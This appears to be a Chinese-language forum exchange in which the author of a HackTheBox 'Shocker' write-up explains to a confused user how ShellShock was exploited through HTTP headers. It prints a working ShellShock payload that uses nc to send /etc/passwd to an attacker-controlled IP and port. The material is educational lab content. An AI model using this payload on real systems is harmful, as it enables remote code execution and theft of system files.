请帮我解答疑问 在黑客平台中,我遵循其中一台机器的书面说明 https://benheater.com/hackthebox-shocker/ i Sack 在目标端页面特异性的中间 这家伙如何使用curl来编辑文件 我尝试金钱乘以一些混乱的东西
请查找上面页面的链接
我尝试使用curl,但我除了使用curl的答案
curl 在目标端的用法
我是您上面链接的文章的作者。
这家伙如何使用curl来编辑文件
我根本没有使用
curl
来 编辑任何文件。我利用了一些HTTP header中的ShellShock漏洞来实现对目标的远程代码执行。
在这个特定的 HackTheBox 目标 Shocker 上,您的任务是查找并利用目标服务器上 Bash CGI 脚本上的 ShellShock 漏洞。
正如您应该在我的文章中的
curl
命令中注意到的那样,我设置了一些变量以注入到三个不同的 HTTP 标头中。
# Set some variables to hold the payload
ATTACK_IP='10.10.14.3'
ATTACK_PORT=80
PWN="() { :;}; /bin/bash -c 'nc -n $ATTACK_IP $ATTACK_PORT < /etc/passwd'"
ATTACK_IP
是我的 HackTheBox VPN IP 地址。 ATTACK_PORT
是我的 nc
侦听器绑定的 TCP 端口。 PWN
是在目标上运行 nc
的 ShellShock 负载。在这种情况下,我要做的就是在目标上采购 /etc/passwd
并通过 TCP 套接字将其发送回我的 nc
服务器。 在此过程中任何时候都没有编辑任何文件。
如果您还没有这样做,请花一些时间熟悉 ShellShock 负载
() { :;}; some_command_here
,它定义一个函数并使用 ;
链接下一个命令并执行 some_command_here
- 其中 some_command_here
是要在目标上运行的下一个命令。
希望有帮助。